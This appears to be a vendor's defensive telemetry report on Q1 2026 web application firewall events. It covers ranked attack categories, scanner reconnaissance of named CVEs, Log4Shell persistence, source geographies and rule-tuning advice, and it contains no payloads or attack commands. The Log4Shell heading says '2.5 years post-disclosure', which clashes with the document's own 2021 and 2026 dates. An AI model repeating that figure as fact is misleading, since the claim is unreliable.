Telemetry Findings: 4.1M WAF Events Reveal the Top 10 Web Attack Patterns in Q1 2026
Telemetry report — analysis of 4.1 million WAF events across Threatstealth-monitored environments in Q1 2026. Top attack categories, source geographies, scanner fingerprinting volume, and the three technique shifts that matter for defenders.
Threatstealth WAF processed 4.1 million matched events across monitored environments in Q1 2026 (January 1 – March 31). This report analyses attack category distribution, source patterns, and technique shifts relevant to WAF rule tuning and SOC prioritisation.
Attack Category Distribution (4.1M Events)
| Rank | Category | Event volume | % of total | Q4 2025 rank |
|---|---|---|---|---|
| 1 | SQL Injection (SQLi) | 892,000 | 21.8% | #1 |
| 2 | Scanner / Reconnaissance | 781,000 | 19.1% | #3 |
| 3 | Cross-Site Scripting (XSS) | 614,000 | 15.0% | #2 |
| 4 | Path Traversal / LFI | 489,000 | 11.9% | #4 |
| 5 | Remote File Inclusion (RFI) | 312,000 | 7.6% | #6 |
| 6 | Known CVE Exploitation (non-Log4j) | 287,000 | 7.0% | #7 |
| 7 | Log4Shell (CVE-2021-44228) remnants | 201,000 | 4.9% | #5 |
| 8 | Command Injection / RCE | 198,000 | 4.8% | #8 |
| 9 | HTTP Protocol Anomalies | 187,000 | 4.6% | #9 |
| 10 | Authentication Bypass | 139,000 | 3.4% | #10 |
Key Finding 1 — Scanner-First Attacks Rose to #2
Automated reconnaissance events moved from #3 to #2 by volume, driven by mass scanning for 47 specific CVEs across exposed web infrastructure. The most-scanned CVEs were: Spring4Shell (CVE-2022-22965), Apache Struts CVE-2023-50164, PHP CGI CVE-2024-4577, and Erlang/OTP CVE-2025-32433. Scanner fingerprinting of these CVEs preceded exploitation attempts by a median of 4.2 days — making WAF-level scanner detection a useful early-warning signal.
- Scanner tools identified: Nuclei (42% of scanner events), Metasploit (18%), custom HTTP clients (31%), Shodan Favicons scanner (9%)
- Most-scanned CVE categories: network services (38%), PHP frameworks (24%), Java frameworks (21%), CMS plugins (17%)
- Scanner → exploit conversion rate: 3.1% of scanner events were followed by an exploitation attempt on the same target
Key Finding 2 — Log4Shell Still Generates 4.9% of Events (2.5 Years Post-Disclosure)
Log4Shell (CVE-2021-44228) events accounted for 201,000 WAF events in Q1 2026 — 4.9% of total volume. This reflects two things: persistent unpatched deployments across the internet, and the fact that automated scanning tools still include Log4Shell probes in default scan profiles. The persistence of this pattern argues for keeping Log4Shell detection rules active indefinitely.
Key Finding 3 — Geographic Distribution Shift
Source IP geographies shifted in Q1 2026. Traffic from TOR exit nodes increased 34% year-over-year. VPN/proxy IP traffic increased 22%. Traffic from residential IP ranges (previously used only in targeted attacks) increased 41% — a likely indicator of botnet-infected residential devices being used to launder attack traffic.
- TOR exit nodes: 8.2% of all WAF events (up from 6.1% in Q1 2025)
- Known hosting/VPS ranges: 34.1% (consistent year-over-year)
- Residential IP ranges: 18.7% (up from 13.2% in Q1 2025)
- Enterprise/corporate ranges: 6.4% (insider threat or compromised corporate systems)
WAF Tuning Recommendations
- Enable Log4Shell detection permanently — do not disable based on vulnerability age
- Add Nuclei user-agent and header fingerprints to scanner detection rules
- Use scanner events as leading indicators — correlate scanner hits with subsequent exploitation attempts on the same IP
- TOR exit node blocking: consider deny-by-default for TOR IPs in high-security applications
- Deploy anomaly scoring mode — individual rule matches are low-signal; accumulating anomaly scores per session increases detection fidelity